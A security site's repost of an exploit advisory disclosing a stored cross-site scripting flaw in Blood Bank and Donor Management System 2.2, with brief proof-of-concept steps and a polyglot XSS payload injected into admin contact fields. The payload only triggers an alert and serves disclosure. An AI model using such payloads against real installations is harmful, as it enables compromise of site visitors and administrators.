Exploit/Advisories

Published on September 13th, 2023 📆 | 6118 Views ⚑

0

Blood Bank And Donor Management System 2.2 Cross Site Scripting – Torchsec

Text to Speech Voices

Blood Bank And Donor Management System 2.2 Cross Site Scripting: Posted Sep 13, 2023; Authored by SoSPiro; Blood Bank and Donor Management System version 2.2 suffers from a persistent cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | f4bac742cbacc0bd280c242baa21d84a81c0c8bea256cbd8eace4e1e86001710; Download | Favorite | View

# Exploit Title: Blood Bank & Donor Management System using v2.2 - Stored XSS
# Application: Blood Donor Management System
# Version: v2.2   
# Bugs:  Stored XSS
# Technology: PHP
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/blood-bank-donor-management-system-free-download/
# Date: 12.09.2023
# Author: SoSPiro
# Tested on: Windows#POC
========================================
1. Login to admin account
2. Go to /admin/update-contactinfo.php
3. Change "Adress" or " Email id " or " Contact Number" inputs and add "/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('1') )//%0D%0A%0d%0a//\x3csVg/
4. Go to http://bbdms.local/inedx.php page and XSS will be triggered.

Tagged with: bank • blood • cross • donor • management • scripting • Site • system • torchsec

Leave a Reply Cancel reply

🌟 Your Account

Username/Email Password
Remember Me
Register
🔔 Email Subscriptions

Get new posts by email
- Donate Via Wallets
  MetaMask
  
  Trust Wallet
  
  Binance Wallet
  
  WalletConnect
Feed

Cisco Warns of Vulnerability in IOS and IOS XE Software After Exploitation Attempts
29 September 2023
Sep 29, 2023THNVulnerability / Network Security Cisco is warning of attempted exploitation of a security ➕
Google Releases Patch for Actively Exploited Zero-Day Vulnerability
28 September 2023
Sep 28, 2023THNZero Day / Vulnerability Google on Wednesday rolled out fixes to address a ➕
Satellite Images Show the Devastating Cost of Sudan’s Aerial War
28 September 2023
On Thursday, the head of the Sudanese Army, Abdel Fattah al-Burhan, addressed the United Nations ➕
Red Hat Security Advisory 2023-5376-01 – Torchsec
28 September 2023
—–BEGIN PGP SIGNED MESSAGE—–Hash: SHA256 =====================================================================Red Hat Security Advisory Synopsis: Important: Red Hat OpenShift Data ➕
Gentoo Linux Security Advisory 202309-09 – Torchsec
29 September 2023
– – – – – – – – – – – – – – – ➕
Popular
- A New Cybercrime Group Linked to 7 Ransomware Families by Admin September 26, 2023 Cybersecurity experts have shed light on a new cybercrime group… (9)
- Mozilla: Your New Car Is a Data Privacy Nightmare by Admin September 13, 2023 Eighty-four percent of the brands that researchers studied share or… (8)
- GitHub Repositories Hit by Password-Stealing Commits… by Admin September 28, 2023 Sep 28, 2023THNSupply Chain / Malware A new malicious campaign… (7)
- Ivanti Avalance Remote Code Execution – Torchsec by Admin September 5, 2023 """Exploit Title: Ivanti Avalanche (6)
Gloss
- great 126rt on New Report Uncovers Three Distinct Clusters of China-Nexus Attacks on Southeast Asian Government
- More info on Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec
- Hyperbaric Oxygen เชียงใหม่ on Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec
- sga508 on Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec
- inpatient detox near me on Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec
- buy auto instagram followers on Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec
- Source URL on Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec
- Click here on Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec
- adding a wall to a finished basement on Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec
- massage therapists near me on Exclusive: Southeast Asia to set ‘guardrails’ on AI with new governance code
☕️Social Media

Torchsec

Tweets by Torch_sec
👥Members

Newest | Active | Popular
- Louie Hursey
  
  registered 2 days, 10 hours ago
- Michell Real
  
  registered 1 week, 1 day ago
- Maryjo Combes
  
  registered 1 week, 1 day ago
- Janina Midgette
  
  registered 2 weeks, 2 days ago
- Lola Reiter
  
  registered 2 weeks, 2 days ago
🌍 Forum Groups

Newest | Active | Popular | Alphabetical
- General Talk
  
  active 2 days, 10 hours ago
- Help Me !!
  
  active 2 days, 10 hours ago
- Comments & Suggestions
  
  active 2 days, 10 hours ago
- Ebooks – Papers
  
  active 2 days, 10 hours ago
- Embedded Systems, Electronics, Gadgets, and DIY
  
  active 2 days, 10 hours ago
linktr.ee/obewyn

We share and comment on interesting infosec related news, tools and more. Follow us on RSS ,Facebook or Twitter for the latest updates. Torchsec is designed to help Auditors, Pentesters & Security Experts to keep their ethical hacking oriented toolbox up-to-date .
This website is made for educational and ethical testing purposes only。It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this website.

Archives

© Torchsec Privacy Policy Disclaimer T&C

Back to Top ↑